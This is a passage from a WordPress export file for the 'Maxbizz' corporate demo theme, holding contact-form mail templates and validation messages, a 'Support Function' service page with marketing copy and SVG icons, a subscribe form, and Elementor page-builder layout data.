This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)";s:18:"additional_headers";s:22:"Reply-To: [your-email]";s:11:"attachments";s:0:"";s:8:"use_html";b:0;s:13:"exclude_blank";b:0;}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_mail_2]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:6:"active";b:0;s:7:"subject";s:24:"Maxbizz "[your-subject]"";s:6:"sender";s:38:"Maxbizz <wordpress@wpdemo.archiwp.com>";s:9:"recipient";s:12:"[your-email]";s:4:"body";s:121:"Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)";s:18:"additional_headers";s:33:"Reply-To: support@oceanthemes.net";s:11:"attachments";s:0:"";s:8:"use_html";b:0;s:13:"exclude_blank";b:0;}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_messages]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:22:{s:12:"mail_sent_ok";s:45:"Thank you for your message. It has been sent.";s:12:"mail_sent_ng";s:71:"There was an error trying to send your message. Please try again later.";s:16:"validation_error";s:61:"One or more fields have an error. Please check and try again.";s:4:"spam";s:71:"There was an error trying to send your message. Please try again later.";s:12:"accept_terms";s:69:"You must accept the terms and conditions before sending your message.";s:16:"invalid_required";s:22:"The field is required.";s:16:"invalid_too_long";s:22:"The field is too long.";s:17:"invalid_too_short";s:23:"The field is too short.";s:12:"invalid_date";s:29:"The date format is incorrect.";s:14:"date_too_early";s:44:"The date is before the earliest one allowed.";s:13:"date_too_late";s:41:"The date is after the latest one allowed.";s:13:"upload_failed";s:46:"There was an unknown error uploading the file.";s:24:"upload_file_type_invalid";s:49:"You are not allowed to upload files of this type.";s:21:"upload_file_too_large";s:20:"The file is too big.";s:23:"upload_failed_php_error";s:38:"There was an error uploading the file.";s:14:"invalid_number";s:29:"The number format is invalid.";s:16:"number_too_small";s:47:"The number is smaller than the minimum allowed.";s:16:"number_too_large";s:46:"The number is larger than the maximum allowed.";s:23:"quiz_answer_not_correct";s:36:"The answer to the quiz is incorrect.";s:13:"invalid_email";s:38:"The e-mail address entered is invalid.";s:11:"invalid_url";s:19:"The URL is invalid.";s:11:"invalid_tel";s:32:"The telephone number is invalid.";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_additional_settings]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_locale]]></wp:meta_key>
		<wp:meta_value><![CDATA[en_US]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Subscribe Form</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/?post_type=wpcf7_contact_form&#038;p=741</link>
		<pubDate>Thu, 10 Sep 2020 08:29:17 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=wpcf7_contact_form&#038;p=741</guid>
		<description></description>
		<content:encoded><![CDATA[<div class="team-form flex-middle">
[text* your-name placeholder "Your Name *"]
[email* your-email placeholder "Your Email *"]
<button type="submit" class="octf-btn">Subscribe Now</button>
</div>
1
Maxbizz "[your-subject]"
Maxbizz 
support@oceanthemes.net
From: [your-name] 
Subject: [your-subject]

Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)
Reply-To: [your-email]




Maxbizz "[your-subject]"
Maxbizz 
[your-email]
Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)
Reply-To: support@oceanthemes.net



Thank you for your message. It has been sent.
There was an error trying to send your message. Please try again later.
One or more fields have an error. Please check and try again.
There was an error trying to send your message. Please try again later.
You must accept the terms and conditions before sending your message.
The field is required.
The field is too long.
The field is too short.
The date format is incorrect.
The date is before the earliest one allowed.
The date is after the latest one allowed.
There was an unknown error uploading the file.
You are not allowed to upload files of this type.
The file is too big.
There was an error uploading the file.
The number format is invalid.
The number is smaller than the minimum allowed.
The number is larger than the maximum allowed.
The answer to the quiz is incorrect.
The e-mail address entered is invalid.
The URL is invalid.
The telephone number is invalid.]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>741</wp:post_id>
		<wp:post_date><![CDATA[2020-09-10 08:29:17]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-10 08:29:17]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[our-team-form]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[wpcf7_contact_form]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_form]]></wp:meta_key>
		<wp:meta_value><![CDATA[<div class="team-form flex-middle">
[text* your-name placeholder "Your Name *"]
[email* your-email placeholder "Your Email *"]
<button type="submit" class="octf-btn">Subscribe Now</button>
</div>]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_mail]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:6:"active";b:1;s:7:"subject";s:24:"Maxbizz "[your-subject]"";s:6:"sender";s:38:"Maxbizz <wordpress@wpdemo.archiwp.com>";s:9:"recipient";s:23:"support@oceanthemes.net";s:4:"body";s:179:"From: [your-name] <[your-email]>
Subject: [your-subject]

Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)";s:18:"additional_headers";s:22:"Reply-To: [your-email]";s:11:"attachments";s:0:"";s:8:"use_html";b:0;s:13:"exclude_blank";b:0;}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_mail_2]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:6:"active";b:0;s:7:"subject";s:24:"Maxbizz "[your-subject]"";s:6:"sender";s:38:"Maxbizz <wordpress@wpdemo.archiwp.com>";s:9:"recipient";s:12:"[your-email]";s:4:"body";s:121:"Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)";s:18:"additional_headers";s:33:"Reply-To: support@oceanthemes.net";s:11:"attachments";s:0:"";s:8:"use_html";b:0;s:13:"exclude_blank";b:0;}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_messages]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:22:{s:12:"mail_sent_ok";s:45:"Thank you for your message. It has been sent.";s:12:"mail_sent_ng";s:71:"There was an error trying to send your message. Please try again later.";s:16:"validation_error";s:61:"One or more fields have an error. Please check and try again.";s:4:"spam";s:71:"There was an error trying to send your message. Please try again later.";s:12:"accept_terms";s:69:"You must accept the terms and conditions before sending your message.";s:16:"invalid_required";s:22:"The field is required.";s:16:"invalid_too_long";s:22:"The field is too long.";s:17:"invalid_too_short";s:23:"The field is too short.";s:12:"invalid_date";s:29:"The date format is incorrect.";s:14:"date_too_early";s:44:"The date is before the earliest one allowed.";s:13:"date_too_late";s:41:"The date is after the latest one allowed.";s:13:"upload_failed";s:46:"There was an unknown error uploading the file.";s:24:"upload_file_type_invalid";s:49:"You are not allowed to upload files of this type.";s:21:"upload_file_too_large";s:20:"The file is too big.";s:23:"upload_failed_php_error";s:38:"There was an error uploading the file.";s:14:"invalid_number";s:29:"The number format is invalid.";s:16:"number_too_small";s:47:"The number is smaller than the minimum allowed.";s:16:"number_too_large";s:46:"The number is larger than the maximum allowed.";s:23:"quiz_answer_not_correct";s:36:"The answer to the quiz is incorrect.";s:13:"invalid_email";s:38:"The e-mail address entered is invalid.";s:11:"invalid_url";s:19:"The URL is invalid.";s:11:"invalid_tel";s:32:"The telephone number is invalid.";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_additional_settings]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_locale]]></wp:meta_key>
		<wp:meta_value><![CDATA[en_US]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Support Function</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/our-services/support-function/</link>
		<pubDate>Tue, 22 Sep 2020 02:54:11 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=999</guid>
		<description></description>
		<content:encoded><![CDATA[<img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box5.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box5.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box5-1-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box5-1-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px">
<h3>We Conduct Marketing Research</h3>
It’s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique "Today Forward, Future Back" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We’ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.

Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.

75
<h6>marketing analysis</h6>
65
<h6>business innovation</h6>
90
<h6>finance strategy</h6>
<h3>We are Always Ready to Assist Our Clients</h3>
developing financial processes and procedures
<h4>How It Works &amp; How We Do It</h4>
Our specialists are ready to provide an analysis of both the market as a whole and its individual components (competitors, consumers, product, etc.), using practical methods and starting from your research goals.
<ul>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.</li>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.</li>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

there are projects that require temporary expansion of the marketing department. Align your marketing  and brand strategy with overarching business objectives. We help you combine hard metrics with creative.</li>
</ul>
<blockquote>“I cannot give you the formula for success, but I can give you the
formula for failure. It is: Try to please everybody.”
<cite>david oswald</cite></blockquote>
<h4>Business Planning &amp; Strategy</h4>
<img width="466" height="296" src="https://maxbizz.s3.amazonaws.com/images/chart1-service-home4.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart1-service-home4.png 466w, https://maxbizz.s3.amazonaws.com/images/chart1-service-home4-300x191.png 300w" sizes="(max-width: 466px) 100vw, 466px">

Nurture promoters, your loyal customers who are more profitable and will advocate for your business—both in good times and bad.

Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization. Identify quick, targeted customized solutions and operational improvements.
<h5>Services</h5>
<ul>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/marketing-research">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

marketing research
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

Organizational Audit
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/business-consulting">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

business consulting
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

project management
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

support functions
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

finance planning
</a></li>
</ul>
<h5>Contacts</h5>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve"></svg>
<g>
<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
<h6>
					Visit Us Daily</h6>
411 University St, Seattle

<a href="tel:+1-800-456-478-23">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve"></svg>
<g>
<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</a>
<h6>
					<a href="tel:+1-800-456-478-23">Have Any Questions?</a></h6>
+1-800-456-478-23

<a href="mailto:maxbizz@mail.com">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m8.75 17.612v4.638c0 .324.208.611.516.713.077.025.156.037.234.037.234 0 .46-.11.604-.306l2.713-3.692z"></path><path d="m23.685.139c-.23-.163-.532-.185-.782-.054l-22.5 11.75c-.266.139-.423.423-.401.722.023.3.222.556.505.653l6.255 2.138 13.321-11.39-10.308 12.419 10.483 3.583c.078.026.16.04.242.04.136 0 .271-.037.39-.109.19-.116.319-.311.352-.53l2.75-18.5c.041-.28-.077-.558-.307-.722z"></path></svg>				</a>
<h6>
					<a href="mailto:maxbizz@mail.com">Mail Us</a></h6>
maxbizz@mail.com

<a href="#">
<img width="270" height="90" src="https://maxbizz.s3.amazonaws.com/images/img-btn-pdf-home4.jpg" alt="" loading="lazy">								</a>
<img src="https://maxbizz.s3.amazonaws.com/images/04_Full_White.svg" alt="" loading="lazy">
<p role="status" aria-live="polite" aria-atomic="true"></p>

<ul></ul>
<form action="/maxbizz-corporate/wp-admin/admin-ajax.php#wpcf7-f741-o1" method="post" novalidate="novalidate" data-status="init">
<input type="hidden" name="_wpcf7" value="741">
<input type="hidden" name="_wpcf7_version" value="5.3">
<input type="hidden" name="_wpcf7_locale" value="en_US">
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f741-o1">
<input type="hidden" name="_wpcf7_container_post" value="0">
<input type="hidden" name="_wpcf7_posted_data_hash" value="">
<input type="text" name="your-name" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Name *">
<input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *">
<button type="submit">Subscribe Now</button>
</form>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>999</wp:post_id>
		<wp:post_date><![CDATA[2020-09-22 02:54:11]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-22 02:54:11]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[support-function]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"49a9e54","elType":"section","settings":{"gap":"extended","structure":"20","padding":{"unit":"px","top":"90","right":"0","bottom":"190","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"90","right":"0","bottom":"90","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false},"reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"f99cdb9","elType":"column","settings":{"_column_size":50,"_inline_size":75,"_inline_size_tablet":100},"elements":[{"id":"02efcb6","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box5.jpg","id":906},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_padding":{"unit":"px","top":"0","right":"0","bottom":"42","left":"0","isLinked":false}},"elements":[],"widgetType":"image"},{"id":"2ce419a","elType":"widget","settings":{"title":"We Conduct Marketing Research","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"22","left":"0","isLinked":false},"typography_typography":"custom","typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"typography_font_weight":"600"},"elements":[],"widgetType":"heading"},{"id":"6119ae9","elType":"widget","settings":{"editor":"<p>It\u2019s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique \"Today Forward, Future Back\" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We\u2019ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.<\/p><p>Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"61708e5","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"842b3f0","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"6339130","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"306f17a","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"781b565","elType":"widget","settings":{"bar_style":"circle","title":"business innovation\n","percent":{"unit":"%","size":65,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"fdc54b6","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"8335d80","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"8f5e31e","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-service-detail.jpg","id":935},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"40","right":"0","bottom":"40","left":"0","isLinked":false},"border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"50","left":0,"isLinked":false}},"elements":[{"id":"e5c28dd","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"080e76c","elType":"widget","settings":{"editor":"<h3>We are Always Ready to Assist Our Clients<\/h3><p>developing financial processes and procedures<\/p>","text_color":"#FFFFFF","typography_font_family":"Raleway","typography_font_weight":"400","_padding":{"unit":"px","top":"28","right":"0","bottom":"25","left":"50","isLinked":false},"_border_border":"solid","_border_width":{"unit":"px","top":"0","right":"0","bottom":"0","left":"5","isLinked":false},"_border_color":"#55BB53","_margin":{"unit":"px","top":"0","right":"-15","bottom":"0","left":"-15","isLinked":false},"_css_classes":"section-baner","typography_typography":"custom","typography_font_size_mobile":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"ea3f620","elType":"widget","settings":{"title":"How It Works & How We Do 